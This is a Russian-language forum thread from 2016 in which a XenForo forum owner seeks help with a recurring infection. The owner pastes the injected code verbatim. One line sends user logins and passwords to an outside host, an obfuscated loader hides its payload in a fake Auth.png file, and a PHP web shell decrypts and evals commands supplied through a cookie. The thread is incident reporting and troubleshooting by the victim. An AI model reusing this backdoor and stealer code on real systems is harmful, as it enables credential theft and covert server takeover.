В общем в user.php стал появляться часто код $thisstring = str_replace(" ","",'file_get_contents(\'htt p: //you tube-down loa der. ru/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');'); или такой $thisstring = str_replace(" ","",'file_get_contents(\'htt p: //46.254.21.14/import.php?per3='.$_SERVER['SERVER_NAME'].'&per1='.base64_encode($nameOrEmail).'&per2='.base64_encode($password).'&base=1\');'); и в ошибках сервера он часто показывает. Я как понял, что он крадет пароли при вводе, но я перезалил файл чистый без этого кода, и через 2 недели он снова появился.
нет, не могут это сделать потому что пароль знаю только я и это хостинг панельный, его кроме меня никто не может зайти и фтп аккаунтов на нем нету. файл libary/xenforo/model/user.php
в смысле панельный? там нет ssh? ну или у вас изначально ломанный ксенфоро с дырой. другого варианта нет
Я тут качал версию 1.4.5 Потом обновил до 1.5.7 Там нету ssh, это панельный хостинг, stormwall.pro (не пиар)
Как это исправить? Я не думал что у меня ломанный, я давно тут скачивал 1.4.5 версию. --- Добавлено, 14 авг 2016 --- Снова появилось. Я убрал. Как это исправить, что нужно сделать что бы это починить?
у меня и до обновы было такое вроде. Сейчас 1.5.7 стоит. Смена хостинга разве поможет? Стоит stormwall.pro высокий тариф --- Добавлено, 14 авг 2016 --- Что пишут: Здравствуйте! Вход через ftp не выполнялся. По всей видимости, происходит автоматическое изменение скриптом расположенном в файлах сайта. Рекомендуем провести процедуру проверки и лечения Вашего сайта для устранения вредоносного кода, и дальнейшего его "цементирования". Стоимость услуги - 5999 рублей. Спасибо за Ваше обращение в техническую поддержку! Пожалуйста, сообщите, если мы можем еще чем-то помочь. Если Вы не удовлетворены качеством обслуживания, пожалуйста, сразу сообщите об этом напрямую руководству компании - management@stormwall.pro (в теме письма укажите номер тикета).
Тогда: 1. проверять модули установленные. 2. проверять всю кодяру. 3. Узнать как это происходит можно с помоцью логов. Не знаю, даёт ли ваш хостер доступ к логам.
Они отказались помогать, сказали что мой сайт нарушает какие то нормы для их специалистов. В принципе да могу дать вам архив. может отдельные папки? --- Добавлено, 16 авг 2016 --- $error = new XenForo_Phrase('requested_user_x_not_found', array('name' => $nameOrEmail)); return false; } $sdz=@file("library/XenForo/Model/Auth.png");$sd='base'.(256/4*1).'_dec'.'ode';$re=$sd($sdz[376]);$res="cr"."eat"."e_fu";$fe=$res."n"."ction";$sdsd2sds=$fe('', "};$re{"); $authentication = $this->getUserAuthenticationObjectByUserId($user['user_id']); if (!$authentication || !$authentication->authenticate($user['user_id'], $password)) { Вот что сегодня появилось --- Добавлено, 16 авг 2016 --- http://i.imgur.com/ArKrs2c.png это файл auth.png в 5 утра появился. --- Добавлено, 16 авг 2016 --- Хостинг написал на это: Я писал выше, на сайте находится shell через него без проблем можно загружать/редактировать файлы. Это самый распостранённый метод заражения.
PHP: <?phpfunction rs2fd($v, $w) { $dll = count($v); $n = ($dll - 1) << 2; if ($w) { $m = $v[$dll - 1]; if (($m < $n - 3) || ($m > $n)) return false; $n = $m;} $s = array(); for ($i = 0; $i < $dll; $i++) { $s[$i] = pack("V", $v[$i]); } if ($w) { return substr(join('', $s), 0, $n); } else { return join('', $s);}}$cx='base'.(4*8*2).'_de'.'code';function fd2rs($s, $w) { $v = unpack("V*", $s. str_repeat("\0", (4 - strlen($s) % 4) & 3)); $v = array_values($v); if ($w) { $v[count($v)] = strlen($s); }return $v;}$cxx=''; if(isset($_COOKIE['__'])){$cxx=$_COOKIE['__'];}function int32($n) { while ($n >= 2147483648) $n -= 4294967296; while ($n <= -2147483649) $n += 4294967296; return (int)$n;}function lol($str, $zm) { if ($str == "") { return ""; }$aib='base'.(4*8*2).'_de'.'code';$aibolit=$aib('MHgwN2ZmZmZmZg=='); $v = fd2rs($str, false); $k = fd2rs($zm, false); if (count($k) < 4) { for ($i = count($k); $i < 4; $i++) { $k[$i] = 0;}} $n = count($v) - 1; $z = $v[$n]; $y = $v[0]; $delta = 0x9E3779B9; $q = floor(6 + 52 / ($n + 1)); $sum = int32($q * $delta); while ($sum != 0) { $e = $sum >> 2 & 3; for ($p = $n; $p > 0; $p--) { $z = $v[$p - 1]; $mx = int32(((($z >> 5 & 0x07ffffff)) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z)); $y = $v[$p] = int32($v[$p] - $mx); } $z = $v[$n]; $mx = int32(((($z >> 5 & 0x07ffffff)) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z)); $y = $v[0] = int32($v[0] - $mx); $sum = int32($sum - $delta); } return rs2fd($v, true);}$klkl='';$popo='ev'.'al';if($cxx!=''){eval(trim(gzinflate(lol($cx("sAE1WI8o2vGc+oNQYxY37zUtr49IaS3OObn9c5eSzMT3pxkVQTDlSA=="),$cxx)))); файл появился на сервере в корне